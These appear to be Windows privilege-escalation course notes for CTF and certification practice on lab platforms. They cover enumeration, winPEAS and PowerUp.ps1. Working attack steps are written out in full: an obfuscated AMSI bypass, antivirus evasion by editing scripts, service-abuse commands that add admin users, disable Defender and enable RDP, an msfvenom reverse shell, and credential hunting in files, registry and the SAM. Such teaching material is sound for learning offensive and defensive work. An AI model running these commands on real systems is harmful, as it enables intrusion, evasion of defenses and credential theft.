course Overview

This course focuses on Windows Privilege

Escalation tactics and techniques designed to
help you improve your privilege escalation
game. Students should take this course if they
are interested in:
• Gaining a better understanding of

privilege escalation techniques

• Improving Capture the Flag skillset

• Preparing for certifications such as the

PNPT, OSCP, eCPPT, CEH, etc.

Requirements
• Prior beginner hacking knowledge

preferred
• Prior virtualization knowledge preferred

• A subscription to Hack the Box is required

to complete the course.

• A subscription to TryHackMe is strongly

recommended to complete the course.

What will I learn?
1) How to enumerate Windows systems
manually and with tools
2) A multitude of privilege escalation
techniques, including:
• Kernel Exploits

• Password Hunting

• Impersonation Attacks

• Registry Attacks

• Executable Files

• Schedule Tasks

• Startup Applications

• DLL Hijacking

• Service Permissions

• Windows Subsystem for Linux

• CVE-2019-1388

3) Tons of hands-on experience, including:

• 13 vulnerable machines total

• Capstone challenge

• Custom lab with no installation required

PLEASE NOTE
Due to the cost of Windows licensing, this
course is designed around Hack The Box and
TryHackMe platforms, which are additional
charges, but offer an incredible variety of
vulnerable machines at a fraction of the cost
of one Windows license. I do not receive any
financial incentive from either platform for
utilizing them in the course.

Toolkit:-
https://github.com/Tib3rius/Windows-
PrivEsc-Tools
Basic Enumeration of the System
Before we start looking for privilege escalation opportunities we need to understand a bit
about the machine. We need to know what users have privileges. What patches/hotfixes the
system has.
# Basics
systeminfo
hostname
# Who am I?
whoami
echo %username%
# What users/localgroups are on the machine?
net users
net localgroups
# More info about a specific user. Check if user has privileges.
net user user1
# View Domain Groups
net group /domain
# View Members of Domain Group
net group /domain <Group Name>
# Firewall
netsh firewall show state
netsh firewall show config
# Network
ipconfig /all
route print
arp -A

# How well patched is the system?

wmic qfe get Caption,Description,HotFixID,InstalledOn

Automated Tool |Enumeration

#Executables
1.Winpeas.exe
2.Seatbelt.exe
3.Sharp.exe
#Powershell script
1.powerUp.ps1
2.sherlock.ps1
#Others..
1.windows exploit suggester
Here you have the Github link of this tool:

PEASS-ng/winPEAS at master · carlospolop/PEASS-ng

Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz
Check more information about how to…
github.com

And the most important, here you have the exe to execute in victim
machine.

https://github.com/carlospolop/PEASS-
ng/releases/download/20230101/winPEASx64.exe

Perfect, let’s read the description of the creator from this tool in the
Github repository:

“The goal of this project is to search for possible Privilege

Escalation Paths in Windows environments. It should take only
a few seconds to execute almost all the checks and some
seconds/minutes during the lasts checks searching for
known filenames that could contain passwords (the time depened
on the number of files in your home folder). By default
only some filenames that could contain credentials are searched, you
can use the searchall parameter to search all the list (this could will
add some minutes). The tool is based on SeatBelt.”

Perfect, it’s moment to use it.

POC

First of all you need a victim machine, in my case it’s a 64 bits full
patched Windows 10.

In my Linux machine i start HTTP server with Python3 to transfer the

executable into Windows 10.

In Windows 10 browser i search for my IP:

And i download the file. When i execute the file i see this screen and
the exe it’s executed.
Sections:

• Basic System Information:

• Credentials, system information, Defenses Informations:
• Users information:
• Service Privilege Escalation and DLL Hijacking:
• Network information:
• Passwords founded:
This is ones of the most important things, but Winpeas implant ALL
paths of privilege escalation, its amazing and one of the most used
tools to escalate privileges in Windows.

Conclusions

This is the final for this article, i hope you like it and try to use in CTF’s
or other scenarios.

Thanks to read this :)

Advanced PowerUp.ps1 Usage

PowerUp.ps1 is a program that enables a user to perform quick

checks against a Windows machine for any privilege escalation
opportunities. It is not a comprehensive check against all known
privilege escalation techniques, but it is often a good place to start
when you are attempting to escalate local privileges.

The script can be downloaded from

here: https://github.com/PowerShellMafia/PowerSploit/blob/master/
Privesc/PowerUp.ps1

An Extensive Usage Guide can be found here:

https://powersploit.readthedocs.io/en/latest/
Brief Overview

Here is a brief overview of how to use PowerUp.ps1

1. Download PowerUp.ps1

2. Modify the script to bypass anti-virus

3. Upload the file to the target Windows machine

4. Disable AMSI and bypass PowerShell Execution Policy

5. Run the program and observe the output

6. Select the misconfiguration you want to exploit and run the

provided command.

You don’t have to do all these steps depending on what protections are
in place on the machine so feel free to skip steps that aren’t relevant for
your situation. The first method I go over will touch disk which means
we will need to disable certain protections. If you don’t want to touch
disk, I will provide those methods at the end.

Modifying the Script

After you have downloaded the script, the first thing to do is modify the
script. The reason we want to modify the script is because anti-virus
will read the script and flag it as malware. A lot of the time, the anti-
virus signatures rely on comments in the program to determine if the
program is a “known threat”. To do this, open up a text editor and load
the PowerUp.ps1 file.

I tested this with McAfee, and apparently the signature McAfee uses to
flag this file as “malware” is the comment right at the top of the script.
So let’s remove lines 1–9 from the file and save it.

Bypassing AMSI and Disable Execution Policy

I won’t go into too much detail about what AMSI is, but in short it is a
new security feature that Microsoft has baked into PowerShell and
Windows 10. It uses a string based detection mechanism to detect
“dangerous” commands and potentially malicious scripts. If you want
to read more about AMSI, click here.

PowerShell’s execution policy is a safety feature that controls the

conditions under which PowerShell loads configuration files and runs
scripts. This feature helps prevent the execution of malicious scripts.
Keep in mind though, that is to prevent “average users” from executing
malicious scripts. It’s not a security feature, it’s a safety feature. So you
can simply disable this by typing in the following into a PowerShell
console:
PS C:\> powershell -ep bypass

So now that we have bypassed PowerShell’s execution policy, we need

to disable AMSI. Below is a good bypass for AMSI that hasn’t been
patched by Microsoft yet. Type this into the PowerShell console to
bypass AMSI. There are several others out there, but this is my go-to:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE](
"{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f'Util','A','Amsi','.Management.','utomation.','s','System' )
)."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),(
"{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'
))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Running PowerUp.ps1

Now comes the fun part. We have disabled different protections so now
we should be able to run our script with no problems. Before we can
just run the program, we need to import the program into the current
session. We do this by running one of the following commands:
PS C:\> Import-Module PowerUp.ps1PS C:\> . .\PowerUp.ps1

Now that we have imported the module into the current working
session, we can now run any of the functions that are part of the
PowerUp.ps1 module. The one we are most interested in is Invoke-
AllChecks because it runs all the checks included in the module. To
run it, we simply run that command as shown below:
There is some interesting output here. PowerUp.ps1 will run all the
required checks and spit out a lot of stuff. Let’s take a look at part of
the output. If you notice the section that reads [*] Checking service
permissions… We see a service that comes back as potentially
vulnerable. Here’s a breakdown of some of the output.

• ServiceName: This is the name of the service

• Path: This is where the program is located or run from

• ModifiableFile: If we can abuse this service, this is the file

that will be modified

• StartName: This is who the service runs as. It is important

that this user has higher privileges than our current privileges,
otherwise it will be pointless in exploiting it. Generally we
would like if it is running
with LocalSystem, or Administrator privileges.

• CanRestart: It is important this is True. We must have the

ability to restart the service otherwise the changes can’t take
 place to escalate our privileges. If you have access to restart
the machine that’s an option, but we generally want to avoid
restarting machines if possible.

• AbuseFunction: If we type in this command as-

is, PowerUp.ps1 will exploit the service automatically and
add a user named john with a password of Password123! to
the administrator’s group. (This can be changed of course but
this is the default configuration.)

Now that we have taken a look at this service and determined we can
restart it and it is running as Local Administrator privileges, let’s go
ahead and run the AbuseFunction command that is given. In our
example above this will be Install-ServiceAbuse -Name
‘AbyssWebServer’.

After we run the command, we will notice the output provides the
command that PowerUp.ps1 executed. It looks like it added the
user john with a password of Password123! then it added that user
to the administrator’s group. Let’s confirm that this worked by typing
in net user:
We notice the user john is now added to the computer. If we login
as john we should have full administrative privileges on the computer.

Customizing the Exploit

What if we don’t want to add a user john to the computer and instead
want to do something else? PowerUp.ps1 provides us a way to
customize the command to be run with LocalSystem privileges.
Below are a few examples:

Adding a new user with password with -User and -

Password options
Invoke-ServiceAbuse -Name 'AbyssWebServer' -User hacker -Password
Password1337

Running a custom command (Disable Windows Defender)

Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command "Set-
MpPreference -DisableRealtimeMonitoring $true"

Running a custom command (Enable RDP services)

Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command "reg add
\"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

As you can see the possibilities are endless, but those are a few ideas to
get you started.

#File share linux to windows cmd via smbserver a

server
SMB SERVER SETUP IN LINUX

Linux- sudo smbserver.py <dir>

/home/kali/Dsktop/paylod.exe -smb2support

Win- copy \\192.168.0.135\<dir>\paylod.exe

#Common Password Hunting:-

Readabble location
Registry
Configuration files
SAM(security account manager)
#Cleartext Passwords
Search for them
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.

dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.

findstr /spin "password" *.*
findstr /spin "password" *.*

In Registry
Note:- HKLM-( HKEY_LOCAL_MACHINE):
The HKEY_LOCAL_MACHINE, otherwise known as HKLM, is a Windows Registry tree
that contains configuration data that is used by all users in Windows

Note:- HKCU-(HKEY_CURRENT_USER)
HKEY_CURRENT_USER, or HKCU, is the registry hive in Windows that stores configuration
information specific to the current user
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows
NT\Currentversion\Winlogon"

# SNMP Paramters
reg query
"HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query
"HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

In Configuration files

In SAM(security account manager)

Now we to copy sam and system file to in
attacker machine and crack with tool-
https://github.com/moyix/creddump/archive/refs/heads/master.zip

# Kernal Exploitation :- Kernel is the core component of

an operating system. It has complete control of all the things
happening in a system.
Tools
1.Windows Exploit Suggester
https://github.com/AonCyberLabs/Windows-Exploit-
Suggester/archive/refs/heads/master.zip
2.Windows Exploit Suggester-Next gen(WES-NG)
https://github.com/bitsadmin/wesng/archive/refs/heads/master.zip

# Windows Service Exploitation:- service is a

computer program that operates in the background
Type Of Misconfigurations
1.Binpath (Modifiable service)
2.Unquoted Path
3.Weak Registry Permission
4.Insecure Services executable
5.DLL Hijacking

1.Binpath (Modifiable service)

Commands cheat sheet:
1. Permission
> .\accesschk.exe /accepteula -uwcqv user servicename
2. Configuration Checker
> sc qc serviceName
3. Status Checker:
> sc query ServiceName
4. Change BinPath:
> sc config ServiceName binpath= YourPayload
5. Start/Stop Service:
> net start/stop ServiceName

1.first we need to find the modifiable service

2.Now check the permission ( read,write ,execute )etc..

3.Now check configuration of services

4.Change the bin path with our payload

Note:we need to create msfvenom payload and replace with bin path

5.Start service and get shell (comd- net start daclsvc)

2.Unquoted Service Path?:- When a service is

created whose executable path contains spaces and isn't enclosed
within quotes, leads to a vulnerability known as Unquoted Service Path
which allows a user to gain SYSTEM privileges (only if the vulnerable
service is running with SYSTEM privilege level which most of the time it
is)
Tools:
1.PowerUp.ps1
2.Winpeas.exe

1.first we ned to find a unqueted services ….

2.we need to create payload and replace with service patch c:\program
files\unwuted path service\comman.exe

3.start listening and then start the service

Enjoy
#Weak Registry Permission:-
Tool-
1.winpeas
2.powerup.ps1
-
Reffrence https://pentestlab.blog/2017/03/31/insecure-registry-
permissions/

Commands cheat sheet

File Permission Checker (Read & Write Access): accesschk.exe
/accepteula -uvwqk <Vulnerable reg file>
Can we start/stop Service?
accesschk.exe /accepteula -ucqv <username> <service-name>
Image Path Checker:
reg query <Vulnerable reg path (Complete)>
reg add <Vulnerable reg file (complete path)> /v ImagePath /t
REG_EXPAND_SZ /d <Your Payload> /f
1.we need to find the insecure service with ownership permission

2.check permission red write permission

3.check service modify permission

4.replace payload with this image path

5.start listening and start service and get shell

Enjoy 😊

#Insecure Services executable:

1.we need to find insecure service
Command line cheat sheet:-

File Permissions:

accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Can we Start or Stop Service?

accesschk.exe /accepteula -uvqc <service-name>

Generate Reverse-Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.132 LPORT=4444 -f exe -o revl.exe

Copy Reverse-Shell to Victim Box.

copy /Y C:\Users\user\Desktop\rev1.exe "C:\Program Files\File Permissions Service\filepermservice.exe"

2.we need to check file permission

3.check can we start or stop services

4.createa reverse shell and copy on fileservice.exe inside and start

service and get shell
Task Scheduler exploitation :-
Task Scheduler in Windows
Task Scheduler is a component of Microsoft Windows that provides the
ability to schedule the launch of programs or scripts at pre-defined
times or after specified time intervals
Reference: https://en.wikipedia.org/wiki/Windows_Task_Scheduler

Commands:
schtasks/query /fo LIST /v
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Reference:
https://sushant747.gitbooks.io/total-oscp-guide/
content/privilege_escalation_windows.html
1.we need to find out the auto executable service or task
2.before the exploit we check permission of this script

3.create reverse shell and transfer and reschedule with cleaup.ps1 and
before execute this command listening will we start